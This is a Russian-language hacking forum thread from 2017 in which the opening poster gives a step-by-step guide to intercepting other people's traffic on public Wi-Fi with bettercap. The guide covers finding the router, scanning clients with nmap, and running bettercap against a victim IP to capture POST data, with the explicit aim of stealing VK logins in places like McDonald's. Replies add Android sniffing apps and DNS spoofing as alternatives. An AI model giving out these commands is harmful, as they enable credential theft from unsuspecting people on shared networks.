Bettercap HSTS BY PASS (Ломаем Вк в Макдональдсах)

Тема в разделе "Уязвимости и взлом", создана пользователем bogdanohacker, 30 сен 2017.

  1. bogdanohacker

    bogdanohacker

    Сообщения:
    30
    Баллы:
    6
    Всем привет,сегодня расскажу как нормально спуффать юзеров в публичных Wi-Fi сетях

    Без этого ебаного DNS спуффинга.

    Если конечно нету VPN у юзера а то так не прокатит :D

    Для начала надо понять в какой обоссаный Локальный IP у нашего Роутера

    Пишем в терминале
    ________________________________
    route -n
    ________________________________

    Во вкладке Gateway IP роутера.

    У меня 192.168.1.1

    Дальше нужно понять какие клиенты есть на точке доступа.

    __________________________________
    nmap -sP IP/24
    __________________________________

    У вас будет клиентов дахера, но у меня только мой телефон :D

    Дальше качаем bettercap (если нету)

    ______________________
    apt-get install bettercap
    ______________________

    Запускаем Сниффинг
    ______________________
    bettercap -T IPжертвы --proxy -P POST
    ______________________

    Теперь жуем Пиццу или что вы заказали и ждете :D

    Профит ^_^

    Потом сделаю тему, как заменить изображения на свои:)
  2. Macka

    Macka

    Сообщения:
    95
    Баллы:
    6
    Теперь упростим.Ставим root на свой смартфон,далее из Play Market скачиваем Network Utilities.Потом открываем приложение,выдаём root права,переходим во вкладку Sniffer включаем и радуемся жизни.
  3. bogdanohacker

    bogdanohacker

    Сообщения:
    30
    Баллы:
    6
    Не получиться,так как он сниффает только обычные сертификаты HTTP а вот этот способ спуффает и защищенные сайты!
  4. bogdanohacker

    bogdanohacker

    Сообщения:
    30
    Баллы:
    6
    Так что лучше не морочить себе голову и прийти нормально с Kali и разьебенить все аккаунты :D
  5. Macka

    Macka

    Сообщения:
    95
    Баллы:
    6
    только хотел проверить но вспомнил что сижу через VPN)
  6. bogdanohacker

    bogdanohacker

    Сообщения:
    30
    Баллы:
    6
    Ну как?Атака сработала?
  7. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Поставить Intercepter-ng для Android. Или выполнить тоже самое, что сделал автор, но на Android(Kali есть для Android). Вообще для таких атак существует несколько программ под Android.
  8. Macka

    Macka

    Сообщения:
    95
    Баллы:
    6
    Intercepter-ng тоже у меня имеется)
  9. bogdanohacker

    bogdanohacker

    Сообщения:
    30
    Баллы:
    6
    Ебать я звезда,мою тему дохера просмотрели)P.S Шучу
  10. Kaiser

    Kaiser

    Сообщения:
    8
    Баллы:
    1
    Ну свой пароль я украсть смог, осталось самое сложно - выбраться из дома и нормально затестить
  11. softbloger

    softbloger

    Сообщения:
    7
    Баллы:
    1
    А большинство людей сидят через приложения, их данные не перехватывает
  12. bogdanohacker

    bogdanohacker

    Сообщения:
    30
    Баллы:
    6
    Тогда DNS Spoof в помощь.
  13. DemWeb

    DemWeb

    Сообщения:
    27
    Баллы:
    1
    а можно установить root + Termux доложно работать

Поделиться этой страницей

Top